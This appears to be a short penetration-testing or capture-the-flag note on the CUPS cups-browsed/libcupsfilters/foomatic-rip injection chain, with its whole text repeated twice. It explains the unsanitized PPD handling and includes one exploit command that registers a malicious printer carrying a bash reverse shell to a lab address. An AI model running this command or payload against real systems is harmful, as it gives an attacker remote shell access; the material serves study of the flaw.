IPP

Internet Printing Protocol

cups-browsed, the service that typically listens on all interfaces UDP 631, is what allows adding a printer to a machine remotely. This vulnerability allows any attacker who can reach this machine to trigger a “Get-Printer-Attributes” IPP request being sent to an attacker-controlled URL.

libcupsfilters is responsible for handling the IPP attributes returned from the request. These are written to a temporary Postscript Printer Description (PPD) file without sanitization, allowing malicious attributes to be written.

libppd is responsible for reading a temporary PPD file and turning that into a printer object on the system. It also doesn’t sanitize when reading, allowing for injection of attacker controlled data.

This vulnerability in cups-filters allows for loading a printer using the foomatic-rip print filter, which is a universal converter for transforming PostScript or PDF data into the format that the printer can understand. It has long had issues with command injection, and has been limited to manual installs / configurations only.

Add the malicious printer

python evil-cups.py 10.10.14.6 10.10.11.40 'nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"&'

Now, on the server select the the malicious printer and trigger the option Print Test Page
The default path for printed jobs is /var/spool/cups

Last updated 2 months ago

Internet Printing Protocol

cups-browsed, the service that typically listens on all interfaces UDP 631, is what allows adding a printer to a machine remotely. This vulnerability allows any attacker who can reach this machine to trigger a “Get-Printer-Attributes” IPP request being sent to an attacker-controlled URL.

libcupsfilters is responsible for handling the IPP attributes returned from the request. These are written to a temporary Postscript Printer Description (PPD) file without sanitization, allowing malicious attributes to be written.

libppd is responsible for reading a temporary PPD file and turning that into a printer object on the system. It also doesn’t sanitize when reading, allowing for injection of attacker controlled data.

This vulnerability in cups-filters allows for loading a printer using the foomatic-rip print filter, which is a universal converter for transforming PostScript or PDF data into the format that the printer can understand. It has long had issues with command injection, and has been limited to manual installs / configurations only.

Add the malicious printer

python evil-cups.py 10.10.14.6 10.10.11.40 'nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"&'

Now, on the server select the the malicious printer and trigger the option Print Test Page
The default path for printed jobs is /var/spool/cups

Last updated 2 months ago